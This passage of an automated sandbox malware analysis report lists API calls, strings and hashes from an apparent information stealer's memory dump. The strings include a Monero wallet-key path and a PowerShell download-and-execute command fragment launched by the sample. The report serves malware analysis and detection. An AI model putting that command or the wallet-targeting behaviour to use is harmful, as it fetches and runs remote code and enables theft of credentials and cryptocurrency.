                              • Opcode Fuzzy Hash: ae493ebf0589e958bf730122ee43530718a735161c142abf131e3228dbc0c098
                              • Instruction Fuzzy Hash: BFB172B591010CABDB44FBA1DC56FEE7338AF14308F40451EF506A2191EF386A59CBBA
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: e87684709b634dfc0a2590ed99ebbd72d9c0ca83ad85d0ff44032cc6309320dc
                              • Instruction ID: 9fd1862f587a31df10d69fad3a702183e27ec91c6b676f890a1f9133ed72ceb1
                              • Opcode Fuzzy Hash: e87684709b634dfc0a2590ed99ebbd72d9c0ca83ad85d0ff44032cc6309320dc
                              • Instruction Fuzzy Hash: 00F03A74905209EFD384AFE0A909F3C7B71FB05702F04419DE60986290D6745A51DBD6
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004B4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B4FD1
                              • InternetOpenA.WININET(004D0DDF,00000000,00000000,00000000,00000000), ref: 004B4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 004B5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 004B5041
                              • InternetCloseHandle.WININET(?), ref: 004B50B9
                              • InternetCloseHandle.WININET(?), ref: 004B50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8baeffff36d6504203f4cc7d743ffed7b4a1acb80a9c4dc8fe53e758506d3cac
                              • Instruction ID: 1e2755f4097e79e667a276dbb501a8cb5502d330fc17f60688ca8e20dbf1e4e1
                              • Opcode Fuzzy Hash: 8baeffff36d6504203f4cc7d743ffed7b4a1acb80a9c4dc8fe53e758506d3cac
                              • Instruction Fuzzy Hash: 283108F4A00218ABDB20DF94DC85BDDB7B5EB48704F1081D9E609A7280C7746EC5CFA9
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0118DCC8,00000000,?,004D0E2C,00000000,?,00000000), ref: 004C8130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C8137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004C8158
                              • wsprintfA.USER32 ref: 004C81AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: e0ba6ba2a4ae06acc013f76ce5e10a4b8fe0d422ff40177c54fdf02c1bccef3d
                              • Instruction ID: d86047d0cfa4e6d6c255618117c21b58d4c13c2a24202f04092c32a7306f03de
                              • Opcode Fuzzy Hash: e0ba6ba2a4ae06acc013f76ce5e10a4b8fe0d422ff40177c54fdf02c1bccef3d
                              • Instruction Fuzzy Hash: EF213EB1D44208ABDB00DFD5CC49FAEB7B8FB44714F10411EF605BB280D77869018BA9
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004C8426
                              • wsprintfA.USER32 ref: 004C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C8499
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0118DCE0,00000000,000F003F,?,00000400), ref: 004C84EC
                              • lstrlen.KERNEL32(?), ref: 004C8501
                              • RegQueryValueExA.ADVAPI32(00000000,0118DC68,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,004D0B34), ref: 004C8599
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C8608
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 48eb8fe0f8d21568a79cce088e667d46ee250751e1219f1b35fcc4b928185caa
                              • Instruction ID: 7fc2bf8342cb82e8200d09cee93ffa010e33a7472225c20dd3fb864949cddd25
                              • Opcode Fuzzy Hash: 48eb8fe0f8d21568a79cce088e667d46ee250751e1219f1b35fcc4b928185caa
                              • Instruction Fuzzy Hash: B1210AB5A0021C9BDB64DB54DC85FE9B3B9FB48704F00C19DE60996240DF756A85CFE8
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C76A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C76AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0117BA78,00000000,00020119,00000000), ref: 004C76DD
                              • RegQueryValueExA.ADVAPI32(00000000,0118DC80,00000000,00000000,?,000000FF), ref: 004C76FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 004C7708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 6353687ce02e70434c10e9e60e10f50cbc86373a18dc076d4a39f85a594e1ee1
                              • Instruction ID: f7662d1d3a19decc6793915511496fb4baee7226d85791fa108faf318cba5dc6
                              • Opcode Fuzzy Hash: 6353687ce02e70434c10e9e60e10f50cbc86373a18dc076d4a39f85a594e1ee1
                              • Instruction Fuzzy Hash: A4014FF9A04208BBD700DBE4DD49F7AB7B9EB48701F105159FA09D7290D6B4A900CF55
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0117BA78,00000000,00020119,004C76B9), ref: 004C775B
                              • RegQueryValueExA.ADVAPI32(004C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 004C777A
                              • RegCloseKey.ADVAPI32(004C76B9), ref: 004C7784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: ee2704bf1f6d360f24018de7149d365626eb188f01c96ecf225d823806eed2b6
                              • Instruction ID: 42752eafe9f5931db78a48c5341c87dee07039d8b0df40e5c1047d5a429bf17a
                              • Opcode Fuzzy Hash: ee2704bf1f6d360f24018de7149d365626eb188f01c96ecf225d823806eed2b6
                              • Instruction Fuzzy Hash: 3501F4F9A40308BBD700DBE4DC49FBEB7B9EB48705F104559FA19A7285DAB46500CB51
                              APIs
                              • CreateFileA.KERNEL32(:L,80000000,00000003,00000000,00000003,00000080,00000000,?,004C3AEE,?), ref: 004C92FC
                              • GetFileSizeEx.KERNEL32(000000FF,:L), ref: 004C9319
                              • CloseHandle.KERNEL32(000000FF), ref: 004C9327
                              Strings
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID: :L$:L
                              • API String ID: 1378416451-1792521768
                              • Opcode ID: 4bcc5cb2b03e73f00449f74d80de2da298cbc07ce617d30c006b7ae088644c97
                              • Instruction ID: 980ba2848ae8993bd416dde3b94a1cc87f38a2a392ac4e9273f3dab60a782b68
                              • Opcode Fuzzy Hash: 4bcc5cb2b03e73f00449f74d80de2da298cbc07ce617d30c006b7ae088644c97
                              • Instruction Fuzzy Hash: F2F03C79E40208BBDB10DFF1DC49FAE77FAAB48710F108658BA55AB2D0D674AA01CF45
                              APIs
                              • memset.MSVCRT ref: 004C40D5
                              • RegOpenKeyExA.ADVAPI32(80000001,0118D140,00000000,00020119,?), ref: 004C40F4
                              • RegQueryValueExA.ADVAPI32(?,0118DEC0,00000000,00000000,00000000,000000FF), ref: 004C4118
                              • RegCloseKey.ADVAPI32(?), ref: 004C4122
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4147
                              • lstrcat.KERNEL32(?,0118DED8), ref: 004C415B
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: 7feed298a7688b936ab5107d4efc7459e67a6d94770637ff68b7e6f071594990
                              • Instruction ID: 3ecaf638fdab6a1ba417ddc6c2471bceac1d40e26a709d56df8cf9cdc64cf053
                              • Opcode Fuzzy Hash: 7feed298a7688b936ab5107d4efc7459e67a6d94770637ff68b7e6f071594990
                              • Instruction Fuzzy Hash: 3C41D8F6D001086BDB24EBE0EC56FFE737DAB88304F40855DB61956181EA755B88CBA2
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                              • LocalFree.KERNEL32(004B148F), ref: 004B9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 89eff45a9907334333e59b38f865de3ba8a25e736b3ab61506dbafde422bbf07
                              • Instruction ID: ac6c016cfb54616216b326d344a0f6924d9fe097ebf3829ec6e2b230b43835d1
                              • Opcode Fuzzy Hash: 89eff45a9907334333e59b38f865de3ba8a25e736b3ab61506dbafde422bbf07
                              • Instruction Fuzzy Hash: 6E3123B4A00209EFDB10CFA4C885BEEB7B5BF48340F108159E915A7390C778AE41CFA5
                              APIs
                              Strings
                              Yara matches
                              Similarity
                              • API ID: String___crt$Typememset
                              • String ID:
                              • API String ID: 3530896902-3916222277
                              • Opcode ID: ccd9ede9687d2ef8633bb49a70adc16a394029b1f8cb1cd9b9d7381e587243b7
                              • Instruction ID: 57c7aa0819a869bb3b7cf9750b07e757c247db47115322f2a81f4bffe816db2d
                              • Opcode Fuzzy Hash: ccd9ede9687d2ef8633bb49a70adc16a394029b1f8cb1cd9b9d7381e587243b7
                              • Instruction Fuzzy Hash: 7D4137B950078C5EDB618B24CCC4FFBBBE89F05708F1444EEE98E86182D2359A45CF68
                              APIs
                              • lstrcat.KERNEL32(?,0118DF98), ref: 004C47DB
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C4801
                              • lstrcat.KERNEL32(?,?), ref: 004C4820
                              • lstrcat.KERNEL32(?,?), ref: 004C4834
                              • lstrcat.KERNEL32(?,0117B210), ref: 004C4847
                              • lstrcat.KERNEL32(?,?), ref: 004C485B
                              • lstrcat.KERNEL32(?,0118D120), ref: 004C486F
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004C8D90: GetFileAttributesA.KERNEL32(00000000,?,004B1B54,?,?,004D564C,?,?,004D0E1F), ref: 004C8D9F
                                • Part of subcall function 004C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004C4580
                                • Part of subcall function 004C4570: RtlAllocateHeap.NTDLL(00000000), ref: 004C4587
                                • Part of subcall function 004C4570: wsprintfA.USER32 ref: 004C45A6
                                • Part of subcall function 004C4570: FindFirstFileA.KERNEL32(?,?), ref: 004C45BD
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: bdf2aec6c53e5f5ea46aa92ad78e41cc954ca31fc2397fd2f5cb0e26f0d33f37
                              • Instruction ID: 5c8026a7351a947653fb78bb12aabb7eb9180555781bbcbbb93b8d3b4584b991
                              • Opcode Fuzzy Hash: bdf2aec6c53e5f5ea46aa92ad78e41cc954ca31fc2397fd2f5cb0e26f0d33f37
                              • Instruction Fuzzy Hash: 413162F690020867CB50FBB0DC85FE9737DAB58704F40458EB31996091EEB99789CBA9
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004C2D85
                              Strings
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004C2D04
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 004C2CC4
                              • <, xrefs: 004C2D39
                              • ')", xrefs: 004C2CB3
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: e073a0c221e6fda998e12a035e36e44226c2d38fc73d6c9bbe6eaad883f7cd7a
                              • Instruction ID: 3a3b4262729f87c763d02612278d79cff3337faf4cf63b702aca391621eea431
                              • Opcode Fuzzy Hash: e073a0c221e6fda998e12a035e36e44226c2d38fc73d6c9bbe6eaad883f7cd7a
                              • Instruction Fuzzy Hash: EF41ED75C0020C9BDB54FBA1C896FEDB774AF10308F50411EE016A7191DF786A5ACFA9
                              APIs
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004B9F41
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 4171519190-1096346117
                              • Opcode ID: 915f02962cdac0eabeb8de86063ca259831c1b116f3ed4afadc40acf56f15255
                              • Instruction ID: af3b299ffea711cfca7222b2aa4696261a8ef3ff06b4ac4ef520843663e2a004
                              • Opcode Fuzzy Hash: 915f02962cdac0eabeb8de86063ca259831c1b116f3ed4afadc40acf56f15255
                              • Instruction Fuzzy Hash: BC61517490024CABDB24EFA5CC96FED7775AF54308F00801EF90A5F291DB786A16CB66
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • memset.MSVCRT ref: 004C716A
                              Strings
                              • sL, xrefs: 004C7111
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004C718C
                              • sL, xrefs: 004C72AE, 004C7179, 004C717C
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemset
                              • String ID: sL$sL$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 4047604823-1272997629
                              • Opcode ID: c45cb04913859763d0b1b0ede5da1ad23f6edfe4e17001c18fb97a662e182b53
                              • Instruction ID: 4c1232d13a1e1333692eb88b0c847c435fa547e7b80b505414bbabbaef3a0c4d
                              • Opcode Fuzzy Hash: c45cb04913859763d0b1b0ede5da1ad23f6edfe4e17001c18fb97a662e182b53
                              • Instruction Fuzzy Hash: E75180B4C042089BDB54EB91DC95FEEB774AF44308F1480AEE50577281EB786E88CF69
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7E37
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C7E3E
                              • RegOpenKeyExA.ADVAPI32(80000002,0117B688,00000000,00020119,?), ref: 004C7E5E
                              • RegQueryValueExA.ADVAPI32(?,0118D280,00000000,00000000,000000FF,000000FF), ref: 004C7E7F
                              • RegCloseKey.ADVAPI32(?), ref: 004C7E92
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 5a7db9fded26a09c20f44eb962412a5ead23730f8350280f34dffd15bb8cb038
                              • Instruction ID: 079f0b562e2de1c0377dc0421dc2d2c0d0a4e5d27b0876dc1d62b31daceab00b
                              • Opcode Fuzzy Hash: 5a7db9fded26a09c20f44eb962412a5ead23730f8350280f34dffd15bb8cb038
                              • Instruction Fuzzy Hash: 5D114FB6A44205EBD700DFD4DD49F7BBBB9EB04710F10415AF619A7280D7B85801CBA6
                              APIs
                              • StrStrA.SHLWAPI(0118DC08,?,?,?,004C140C,?,0118DC08,00000000), ref: 004C926C
                              • lstrcpyn.KERNEL32(006FAB88,0118DC08,0118DC08,?,004C140C,?,0118DC08), ref: 004C9290
                              • lstrlen.KERNEL32(?,?,004C140C,?,0118DC08), ref: 004C92A7
                              • wsprintfA.USER32 ref: 004C92C7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpynlstrlenwsprintf
                              • String ID: %s%s
                              • API String ID: 1206339513-3252725368
                              • Opcode ID: 091f60cbc5bc61f6e26665ae5341d7b097717db3b3db32064cb31bc2fe62f84b
                              • Instruction ID: 6be2e55877523e6cf95a0e4fe8625643c428f6f421a706355ab8ad12a0b9cc61
                              • Opcode Fuzzy Hash: 091f60cbc5bc61f6e26665ae5341d7b097717db3b3db32064cb31bc2fe62f84b
                              • Instruction Fuzzy Hash: 4401E5B9504108FFCB04DFE8C998EBE7BBAEB48350F108548F9098B204C635AA41DB95
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004B12B4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004B12BB
                              • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004B12D7
                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004B12F5
                              • RegCloseKey.ADVAPI32(?), ref: 004B12FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
